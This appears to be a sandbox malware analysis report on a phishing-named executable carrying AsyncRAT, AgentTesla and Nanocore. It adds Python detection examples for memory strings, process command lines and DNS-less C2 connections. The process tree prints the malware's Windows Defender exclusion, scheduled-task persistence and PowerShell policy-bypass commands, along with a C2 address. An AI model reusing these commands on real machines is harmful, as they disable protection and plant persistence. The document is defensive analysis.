
Windows Analysis Report RFQ_GGMC-Ref 12-01-2022.exe

Overview

General Information

Sample Name: RFQ_GGMC-Ref 12-01-2022.exe
Analysis ID: 551470
MD5: 9fd45110bad75cda6de67232014aeb6e
SHA1: a43016fa816afd1693fb7f266dd032fd7f061c35
SHA256: b586ca95ba9557f7ad2434d01f96ff191b77541670894df3b78aa3a8312ae092
Tags: AsyncRAT, exe

Detection

Detected families: AgentTesla, AsyncRAT, Nanocore
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Telegram RAT
Yara detected AgentTesla
Yara detected AntiVM3
Yara detected AsyncRAT
Yara detected Nanocore RAT
Sigma detected: Suspicious Script Execution From Temp Folder
Bypasses PowerShell execution policy
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Yara detected Costura Assembly Loader
Sigma detected: Suspicious Add Task From User AppData Temp
Suspicious powershell command line found
.NET source code contains potential unpacker
Sigma detected: Powershell Defender Exclusion
.NET source code contains method to dynamically call methods (often used by packers)
Adds a directory exclusion to Windows Defender
Uses schtasks.exe or at.exe to add and modify task schedules
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Detected TCP or UDP traffic on non-standard ports
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • RFQ_GGMC-Ref 12-01-2022.exe (PID: 6964 cmdline: "C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe" MD5: 9FD45110BAD75CDA6DE67232014AEB6E)
    • powershell.exe (PID: 6080 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lhWbLvHNlciwu.exe MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • schtasks.exe (PID: 6136 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lhWbLvHNlciwu" /XML "C:\Users\user\AppData\Local\Temp\tmp71CD.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 5800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • RFQ_GGMC-Ref 12-01-2022.exe (PID: 7000 cmdline: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe MD5: 9FD45110BAD75CDA6DE67232014AEB6E)
    • RFQ_GGMC-Ref 12-01-2022.exe (PID: 6948 cmdline: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe MD5: 9FD45110BAD75CDA6DE67232014AEB6E)
      • cmd.exe (PID: 5684 cmdline: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "mozille" /tr '"C:\Users\user\AppData\Local\Temp\mozille.exe"' & exit MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 5852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • schtasks.exe (PID: 5580 cmdline: schtasks /create /f /sc onlogon /rl highest /tn "mozille" /tr '"C:\Users\user\AppData\Local\Temp\mozille.exe"' MD5: 15FF7D8324231381BAD48A052F85DF04)
      • cmd.exe (PID: 3868 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpB8D1.tmp.bat"" MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 6276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • conhost.exe (PID: 2532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • timeout.exe (PID: 2292 cmdline: timeout 3 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
        • mozille.exe (PID: 6564 cmdline: "C:\Users\user\AppData\Local\Temp\mozille.exe" MD5: 9FD45110BAD75CDA6DE67232014AEB6E)
          • powershell.exe (PID: 5452 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lhWbLvHNlciwu.exe MD5: DBA3E6449E97D4E3DF64527EF7012A10)
  • mozille.exe (PID: 6316 cmdline: C:\Users\user\AppData\Local\Temp\mozille.exe MD5: 9FD45110BAD75CDA6DE67232014AEB6E)
    • powershell.exe (PID: 5400 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lhWbLvHNlciwu.exe MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • schtasks.exe (PID: 5192 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lhWbLvHNlciwu" /XML "C:\Users\user\AppData\Local\Temp\tmpCDE7.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 6444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • mozille.exe (PID: 6620 cmdline: C:\Users\user\AppData\Local\Temp\mozille.exe MD5: 9FD45110BAD75CDA6DE67232014AEB6E)
      • cmd.exe (PID: 5000 cmdline: "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\jzhlgt.exe"' & exit MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 6876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • powershell.exe (PID: 5648 cmdline: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\jzhlgt.exe"' MD5: DBA3E6449E97D4E3DF64527EF7012A10)
          • jzhlgt.exe (PID: 6500 cmdline: "C:\Users\user\AppData\Local\Temp\jzhlgt.exe" MD5: 76F7AB6A302E47D7F7FDB4EA2540323E)
            • jzhlgt.exe (PID: 5964 cmdline: C:\Users\user\AppData\Local\Temp\jzhlgt.exe MD5: 76F7AB6A302E47D7F7FDB4EA2540323E)
            • jzhlgt.exe (PID: 3076 cmdline: C:\Users\user\AppData\Local\Temp\jzhlgt.exe MD5: 76F7AB6A302E47D7F7FDB4EA2540323E)
      • cmd.exe (PID: 3312 cmdline: "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\dlliok.exe"' & exit MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 6856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • powershell.exe (PID: 4636 cmdline: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\dlliok.exe"' MD5: DBA3E6449E97D4E3DF64527EF7012A10)
          • dlliok.exe (PID: 2804 cmdline: "C:\Users\user\AppData\Local\Temp\dlliok.exe" MD5: 8B4D4FC3E962F26A4C74120F33BB7460)
            • powershell.exe (PID: 6276 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\pLrWNKFD.exe MD5: DBA3E6449E97D4E3DF64527EF7012A10)
            • schtasks.exe (PID: 4872 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pLrWNKFD" /XML "C:\Users\user\AppData\Local\Temp\tmp9C7F.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
              • conhost.exe (PID: 4740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • dlliok.exe (PID: 1316 cmdline: C:\Users\user\AppData\Local\Temp\dlliok.exe MD5: 8B4D4FC3E962F26A4C74120F33BB7460)
              • schtasks.exe (PID: 4412 cmdline: schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmpAD4.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
                • conhost.exe (PID: 6124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • dlliok.exe (PID: 6844 cmdline: C:\Users\user\AppData\Local\Temp\dlliok.exe 0 MD5: 8B4D4FC3E962F26A4C74120F33BB7460)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author
00000028.00000002.578366682.0000000005520000.00000004.00020000.sdmp | Nanocore_RAT_Gen_2 | Detects the Nanocore RAT | Florian Roth
  • 0xe75:$x1: NanoCore.ClientPluginHost
  • 0xe8f:$x2: IClientNetworkHost
00000028.00000002.578366682.0000000005520000.00000004.00020000.sdmp | Nanocore_RAT_Feb18_1 | Detects Nanocore RAT | Florian Roth
  • 0xe75:$x2: NanoCore.ClientPluginHost
  • 0x1261:$s3: PipeExists
  • 0x1136:$s4: PipeCreated
  • 0xeb0:$s5: IClientLoggingHost
0000001D.00000000.485797688.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
0000001D.00000000.485797688.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
00000015.00000002.564363154.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security
(64 further memory-dump matches not shown)
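The memory-dump matches above list the NanoCore marker strings and the offsets at which each was found. The Python below is an added example written for this page, not the Yara rule itself (the published rule's condition is not reproduced): it scans a buffer for those markers as both ASCII and UTF-16LE, since .NET keeps type names as ASCII metadata but user strings as UTF-16LE, and applies a simplified scoring of my own. The sample buffer is constructed to plant the markers at the offsets the report shows; the page does not say which encoding each string has in the real dump, so planting PipeExists as UTF-16LE is an assumption made to exercise that path.

```python
"""Scan a memory dump or unpacked PE for the NanoCore marker strings
reported by the Yara matches above, in ASCII and UTF-16LE."""

# Markers grouped the way the report labels them: $x* (high confidence)
# and $s* (supporting).
X_MARKERS = ("NanoCore.ClientPluginHost", "IClientNetworkHost")
S_MARKERS = ("PipeExists", "PipeCreated", "IClientLoggingHost")


def scan(buf: bytes):
    """Return sorted (offset, encoding, marker, weight) for every occurrence."""
    hits = []
    for weight, markers in (("x", X_MARKERS), ("s", S_MARKERS)):
        for marker in markers:
            needles = (("ascii", marker.encode("ascii")),
                       ("utf-16le", marker.encode("utf-16-le")))
            for enc, needle in needles:
                start = 0
                while (pos := buf.find(needle, start)) != -1:
                    hits.append((pos, enc, marker, weight))
                    start = pos + 1
    return sorted(hits)


def verdict(hits) -> bool:
    """Simplified scoring, an assumption of this example and not the
    published rule's condition: any $x marker, or two distinct $s markers."""
    x_found = {m for _, _, m, w in hits if w == "x"}
    s_found = {m for _, _, m, w in hits if w == "s"}
    return bool(x_found) or len(s_found) >= 2


def build_sample() -> bytes:
    """Constructed test buffer: an MZ stub with the markers planted at the
    offsets the report lists. PipeExists is planted as UTF-16LE by assumption."""
    buf = bytearray(0x2000)
    buf[0:2] = b"MZ"
    plant = [
        (0xE75, "NanoCore.ClientPluginHost", "ascii"),
        (0xE8F, "IClientNetworkHost", "ascii"),
        (0xEB0, "IClientLoggingHost", "ascii"),
        (0x1136, "PipeCreated", "ascii"),
        (0x1261, "PipeExists", "utf-16-le"),
    ]
    for off, marker, enc in plant:
        data = marker.encode(enc)
        buf[off:off + len(data)] = data
    return bytes(buf)


if __name__ == "__main__":
    sample = build_sample()
    for off, enc, marker, weight in scan(sample):
        print(f"{off:#06x} ${weight} {enc:<8} {marker}")
    print("nanocore markers present:", verdict(scan(sample)))
```

Run it against a real dump by replacing build_sample() with the file contents; the offsets it prints can be compared directly with the $x/$s offsets in the table above.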

Unpacked PEs

Source | Rule | Description | Author
7.0.RFQ_GGMC-Ref 12-01-2022.exe.400000.10.unpack | JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security
7.0.RFQ_GGMC-Ref 12-01-2022.exe.400000.4.unpack | JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security
7.0.RFQ_GGMC-Ref 12-01-2022.exe.400000.6.unpack | JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security
7.2.RFQ_GGMC-Ref 12-01-2022.exe.400000.0.unpack | JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security
7.0.RFQ_GGMC-Ref 12-01-2022.exe.400000.12.unpack | JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security
(6 further unpacked-PE matches not shown)

Sigma Overview

System Summary:

Sigma detected: Suspicious Script Execution From Temp Folder
  Source: Process started | Author: Florian Roth, Max Altgelt
  Data: Command: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\jzhlgt.exe"' , CommandLine: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\jzhlgt.exe"' , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\jzhlgt.exe"' & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5000, ProcessCommandLine: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\jzhlgt.exe"' , ProcessId: 5648
Sigma detected: Suspicious Add Task From User AppData Temp
  Source: Process started | Author: frack113
  Data: Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lhWbLvHNlciwu" /XML "C:\Users\user\AppData\Local\Temp\tmp71CD.tmp, CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lhWbLvHNlciwu" /XML "C:\Users\user\AppData\Local\Temp\tmp71CD.tmp, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe" , ParentImage: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe, ParentProcessId: 6964, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lhWbLvHNlciwu" /XML "C:\Users\user\AppData\Local\Temp\tmp71CD.tmp, ProcessId: 6136
Sigma detected: Powershell Defender Exclusion
  Source: Process started | Author: Florian Roth
  Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lhWbLvHNlciwu.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lhWbLvHNlciwu.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe" , ParentImage: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe, ParentProcessId: 6964, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lhWbLvHNlciwu.exe, ProcessId: 6080
Sigma detected: Non Interactive PowerShell
  Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)
  Data: identical to the Powershell Defender Exclusion match above (the same powershell.exe start, ProcessId: 6080, ParentProcessId: 6964)
Sigma detected: T1086 PowerShell Execution
  Source: Pipe created | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
  Data: PipeName: \PSHost.132864805308084968.6080.DefaultAppDomain.powershell
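The process tree and the Sigma matches above show three behaviours a host-side triage check can key on: a Defender exclusion added through Add-MpPreference, scheduled tasks created with their XML or target under the user's Temp folder, and PowerShell run with ExecutionPolicy Bypass to launch a dropped binary. The Python below is an added example written for this page, not Joe Sandbox code and not the Sigma rules themselves. The (pid, parent, command line) triples are transcribed from the process tree; the rule names and regular expressions are my own and are looser than the published Sigma rules, since they match on the command line alone (so the cmd.exe wrapper that carries the same schtasks or powershell command is flagged as well).

```python
"""Triage a sandbox process tree for the chain seen in this report: a
Defender exclusion added through PowerShell, scheduled tasks created from
the user's Temp folder, and PowerShell ExecutionPolicy bypasses that launch
dropped binaries. Matching is on the command line alone."""
import re

# Constructed input: (pid, parent pid, command line) transcribed from the
# process tree above; parent 0 marks a tree root. The stray '"' after some
# image paths is how the report prints them and is left in place.
EVENTS = [
    (6964, 0, r'"C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe"'),
    (6080, 6964, r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lhWbLvHNlciwu.exe'),
    (6136, 6964, r'C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lhWbLvHNlciwu" /XML "C:\Users\user\AppData\Local\Temp\tmp71CD.tmp'),
    (6948, 6964, r'C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe'),
    (5684, 6948, r'''"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "mozille" /tr '"C:\Users\user\AppData\Local\Temp\mozille.exe"' & exit'''),
    (5580, 5684, r'''schtasks /create /f /sc onlogon /rl highest /tn "mozille" /tr '"C:\Users\user\AppData\Local\Temp\mozille.exe"' '''),
    (6316, 0, r'C:\Users\user\AppData\Local\Temp\mozille.exe'),
    (6620, 6316, r'C:\Users\user\AppData\Local\Temp\mozille.exe'),
    (5000, 6620, r'''"C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\jzhlgt.exe"' & exit'''),
    (5648, 5000, r'''powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\jzhlgt.exe"' '''),
    (6500, 5648, r'"C:\Users\user\AppData\Local\Temp\jzhlgt.exe"'),
]

TEMP_DIR = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)
# Leading executable path, tolerating the report's path" args form.
IMAGE = re.compile(r'^"?([^"]+?\.exe)"?(?=\s|$)', re.IGNORECASE)


def image_path(cmdline: str) -> str:
    m = IMAGE.match(cmdline)
    return m.group(1) if m else ""


# Rule names are my own; each approximates the Sigma rule named in its comment.
RULES = {
    # approximates "Powershell Defender Exclusion"
    "defender_exclusion": lambda c: bool(
        re.search(r"powershell", c, re.I)
        and re.search(r"Add-MpPreference\s+-Exclusion(Path|Process|Extension)", c, re.I)),
    # approximates "Suspicious Add Task From User AppData Temp"
    "schtask_from_temp": lambda c: bool(
        re.search(r'schtasks(\.exe)?"?\s+/create', c, re.I) and TEMP_DIR.search(c)),
    # approximates "Suspicious Script Execution From Temp Folder"
    "powershell_policy_bypass": lambda c: bool(
        re.search(r"powershell.*ExecutionPolicy\s+Bypass", c, re.I)),
    # dropped payload executing: the process image itself lives in Temp
    "image_in_temp": lambda c: bool(TEMP_DIR.search(image_path(c))),
}


def triage(events):
    """Map pid -> set of rule names that fired on its command line."""
    findings = {}
    for pid, _parent, cmdline in events:
        hits = {name for name, rule in RULES.items() if rule(cmdline)}
        if hits:
            findings[pid] = hits
    return findings


def ancestry(pid, events=EVENTS):
    """Walk parent links from pid up to its tree root."""
    parents = {p: pp for p, pp, _ in events}
    chain = [pid]
    while parents.get(chain[-1], 0):
        chain.append(parents[chain[-1]])
    return chain


if __name__ == "__main__":
    for pid, hits in sorted(triage(EVENTS).items()):
        print(pid, " <- ".join(map(str, ancestry(pid))), sorted(hits))
```

Feeding real Sysmon event ID 1 or Windows 4688 records in the same (pid, parent, command line) shape reproduces the chain: the ancestry of the jzhlgt.exe start walks back through the ExecutionPolicy bypass, the cmd.exe wrapper and the mozille.exe copy that the onlogon task keeps alive.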

Jbx Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
  Source: RFQ_GGMC-Ref 12-01-2022.exe | VirusTotal: Detection: 26%
Yara detected Nanocore RAT
  Source: Yara match | File source: 00000028.00000000.532162937.0000000000402000.00000040.00000001.sdmp, type: MEMORY
  Source: Yara match | File source: 00000028.00000000.533503527.0000000000402000.00000040.00000001.sdmp, type: MEMORY
  Source: Yara match | File source: 00000028.00000002.575326002.0000000003B89000.00000004.00000001.sdmp, type: MEMORY
  Source: Yara match | File source: 00000028.00000000.534610587.0000000000402000.00000040.00000001.sdmp, type: MEMORY
  Source: Yara match | File source: 00000028.00000000.531340924.0000000000402000.00000040.00000001.sdmp, type: MEMORY
  Source: Yara match | File source: 00000028.00000002.578385897.0000000005530000.00000004.00020000.sdmp, type: MEMORY
  Source: Yara match | File source: 00000021.00000002.539866646.00000000043B9000.00000004.00000001.sdmp, type: MEMORY
  Source: Yara match | File source: 00000028.00000002.564500309.0000000000402000.00000040.00000001.sdmp, type: MEMORY
  Source: Yara match | File source: 00000028.00000002.572373638.0000000002B81000.00000004.00000001.sdmp, type: MEMORY
Antivirus or Machine Learning detection for unpacked file
  Source: 7.0.RFQ_GGMC-Ref 12-01-2022.exe.400000.4.unpack | Avira: Label: TR/Dropper.Gen
  Source: 7.0.RFQ_GGMC-Ref 12-01-2022.exe.400000.10.unpack | Avira: Label: TR/Dropper.Gen
  Source: 7.0.RFQ_GGMC-Ref 12-01-2022.exe.400000.6.unpack | Avira: Label: TR/Dropper.Gen
  Source: 7.2.RFQ_GGMC-Ref 12-01-2022.exe.400000.0.unpack | Avira: Label: TR/Dropper.Gen
  Source: 7.0.RFQ_GGMC-Ref 12-01-2022.exe.400000.12.unpack | Avira: Label: TR/Dropper.Gen
  Source: 7.0.RFQ_GGMC-Ref 12-01-2022.exe.400000.8.unpack | Avira: Label: TR/Dropper.Gen
Source: RFQ_GGMC-Ref 12-01-2022.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
Source: RFQ_GGMC-Ref 12-01-2022.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: IDescriptionMetadataEnt.pdb | source: mozille.exe, mozille.exe, 0000000F.00000000.372058011.0000000000F12000.00000002.00020000.sdmp

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
  Source: Traffic | Snort IDS: 2030673 ET TROJAN Observed Malicious SSL Cert (AsyncRAT Server) 89.238.150.43:5512 -> 192.168.2.3:49720
  Source: Traffic | Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49729 -> 89.238.150.43:5512
  Source: Traffic | Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49730 -> 89.238.150.43:5512
  Source: global traffic | TCP traffic: 192.168.2.3:49720 -> 89.238.150.43:5512
Source: unknown | TCP traffic detected without corresponding DNS query: 89.238.150.43 (this entry is repeated 50 times in the report)
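The Snort alerts and the repeated "TCP traffic detected without corresponding DNS query" entries describe two network properties a defender can alert on without a family signature: a client connecting to an address that no DNS answer produced, and doing so on a port that is not a standard service port. The Python below is an added example, not part of the report. The three flows to 89.238.150.43:5512 are taken from the alerts above; the DNS answer for update.example.com and the HTTPS flow to 203.0.113.10 (TEST-NET-3) are constructed to show the benign path. The set of "standard" ports is an assumption to tune per environment.

```python
"""Flag outbound TCP connections to addresses that no DNS answer produced,
and note when they use a non-standard port, from flow and DNS records."""
from collections import defaultdict
from dataclasses import dataclass
from ipaddress import ip_address, ip_network

INTERNAL = [ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12",
                                    "192.168.0.0/16", "127.0.0.0/8")]
# Ports treated as ordinary client destinations; an assumption to tune.
STANDARD_PORTS = {21, 22, 25, 53, 80, 110, 143, 443, 465, 587, 993, 995}


@dataclass(frozen=True)
class DnsAnswer:
    ts: float
    name: str
    address: str


@dataclass(frozen=True)
class Flow:
    ts: float
    src: str
    sport: int
    dst: str
    dport: int


# Constructed sample. The three flows to 89.238.150.43:5512 mirror the Snort
# alerts above; the DNS answer and the flow to 203.0.113.10 (TEST-NET-3) are
# invented to show the benign path.
DNS = [DnsAnswer(10.0, "update.example.com", "203.0.113.10")]
FLOWS = [
    Flow(11.0, "192.168.2.3", 49718, "203.0.113.10", 443),
    Flow(12.0, "192.168.2.3", 49720, "89.238.150.43", 5512),
    Flow(15.0, "192.168.2.3", 49729, "89.238.150.43", 5512),
    Flow(16.0, "192.168.2.3", 49730, "89.238.150.43", 5512),
]


def is_internal(addr: str) -> bool:
    ip = ip_address(addr)
    return any(ip in net for net in INTERNAL)


def dnsless_flows(dns, flows):
    """Flows to an external address that no DNS answer had resolved by the
    time the connection started. Answers are indexed by address, so a name
    resolving to several IPs is handled; an answer arriving after the
    connection does not excuse it."""
    answered = defaultdict(list)
    for a in dns:
        answered[a.address].append(a.ts)
    return [f for f in flows
            if not is_internal(f.dst)
            and not any(t <= f.ts for t in answered[f.dst])]


def summarise(dns, flows):
    """Per (dst, port): connection count, whether DNS preceded it, and
    whether the port is a standard service port."""
    flagged = set(dnsless_flows(dns, flows))
    out = {}
    for f in flows:
        key = (f.dst, f.dport)
        entry = out.setdefault(key, {"connections": 0, "dns_resolved": True,
                                      "standard_port": f.dport in STANDARD_PORTS})
        entry["connections"] += 1
        if f in flagged:
            entry["dns_resolved"] = False
    return out


if __name__ == "__main__":
    for (dst, port), info in summarise(DNS, FLOWS).items():
        suspicious = not info["dns_resolved"] and not info["standard_port"]
        print(f"{dst}:{port} {info} {'<-- suspicious' if suspicious else ''}")
```

Zeek conn.log and dns.log, or any NetFlow plus resolver log pair, map onto the two record types directly; the time check matters because a late reverse lookup by an analyst must not retroactively clear the connection.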
Source: mozille.exe | String found in binary or memory: http://ati.amd.com/developer/compressonator.html
Source: mozille.exe | String found in binary or memory: http://developer.nvidia.com/object/dds_thumbnail_viewer.html
Source: mozille.exe | String found in binary or memory: http://developer.nvidia.com/object/photoshop_dds_plugins.html
Source: RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000000.294283178.0000000000392000.00000002.00020000.sdmp, RFQ_GGMC-Ref 12-01-2022.exe, 00000005.00000000.327586416.0000000000162000.00000002.00020000.sdmp, RFQ_GGMC-Ref 12-01-2022.exe, 00000007.00000000.333928558.0000000000582000.00000002.00020000.sdmp, RFQ_GGMC-Ref 12-01-2022.exe, 00000007.00000002.361685768.0000000003B04000.00000004.00000001.sdmp, mozille.exe, 0000000E.00000000.362803086.0000000000262000.00000002.00020000.sdmp, mozille.exe, 0000000F.00000000.372058011.0000000000F12000.00000002.00020000.sdmp | String found in binary or memory: http://developer.nvidia.com/object/photoshop_dds_plugins.htmlyhttp://developer.nvidia.com/object/dds
Source: RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.340212666.00000000067C2000.00000004.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.338715728.0000000003709000.00000004.00000001.sdmp, mozille.exe, 0000000E.00000002.394466512.0000000003659000.00000004.00000001.sdmp, mozille.exe, 0000000F.00000002.575440695.00000000042C9000.00000004.00000001.sdmp | String found in binary or memory: http://igaeJZ.so
Source: mozille.exe, mozille.exe, 0000000F.00000002.575440695.00000000042C9000.00000004.00000001.sdmp, mozille.exe, 0000000F.00000002.580953387.00000000078F0000.00000004.00020000.sdmp | String found in binary or memory: http://igaeditor.sourceforge.net/
Source: mozille.exe, mozille.exe, 0000000F.00000000.372058011.0000000000F12000.00000002.00020000.sdmp | String found in binary or memory: http://igaeditor.sourceforge.net/latest.txt
